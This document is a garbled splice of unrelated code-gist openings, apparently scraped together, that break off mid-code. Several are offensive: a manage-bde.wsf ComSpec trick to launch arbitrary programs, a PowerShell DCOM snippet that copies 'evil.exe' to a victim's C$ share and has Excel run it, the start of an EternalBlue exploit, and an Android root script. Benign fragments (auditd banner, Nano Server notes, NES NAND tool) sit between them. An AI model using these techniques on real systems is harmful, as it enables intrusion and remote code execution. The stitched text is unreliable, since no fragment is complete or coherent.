I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32.
Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways.
Here are a few examples that you may or may not find useful -
1) Replace ComSpec Variable
set comspec=c:\windows\system32\calc.exe
cscript manage-bde.wsf

# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
#      ___             ___ __      __
#     /   | __  ______/ (_) /_____/ /
#    / /| |/ / / / __  / / __/ __  /
#   / ___ / /_/ / /_/ / / /_/ /_/ /
#  /_/  |_\__,_/\__,_/_/\__/\__,_/

typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
    BEGIN_INTERFACE
    HRESULT(STDMETHODCALLTYPE *QueryInterface)(
        __RPC__in IFwCplLua * This,
        __RPC__in REFIID riid,
        _COM_Outptr_ void **ppvObject);

$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111"))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
$excel.ActivateMicrosoftApp("5")
# excel executes your binary :)

SignatureOwner | SHA256Hash
---|---
#!/bin/bash
# small tool to retrieve vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)
# sudo apt install curl
parse(){
    local IFS=\>
    read -d \< CELL VALUE
}

#!/usr/bin/python
# This file is no longer updated. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)

#region Step #1 (optional): Salvaging of drivers
# I had to manually install a disk and network driver the last time I installed Nano Server.
# I saved my previous WIM file and exported the installed drivers using the Dism cmdlets.
# These paths are specific to my system.
# This was my old Nano Server TP5 image.
$NanoTP5ImagePath = 'C:\Users\Matt\Desktop\Temp\NanoTP5Setup\NanoServerBin\NanoServer.wim'
$WimTempMountDir = 'C:\Users\Matt\Desktop\TempMountDir'
$ExportedDriverDir = 'C:\Users\Matt\Desktop\ExportedDrivers'

/*
Scramble/descramble raw NAND dumps from the NES Classic.
plutoo 2016
Cheers to brizzo, derrek.
*/
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#!/bin/bash
# Give the usual warning.
clear;
# -e is required for bash's builtin echo to expand the \n escapes below.
echo -e "[INFO] Automated Android root script started.\n\n[WARN] Exploit requires sdk module \"NDK\".\nFor more information, visit the installation guide @ https://goo.gl/E2nmLF\n[INFO] Press Ctrl+C to stop the script if you need to install the NDK module. Waiting 10 seconds...";
sleep 10;
clear;
# Download and extract exploit files.
echo "[INFO] Downloading exploit files from GitHub...";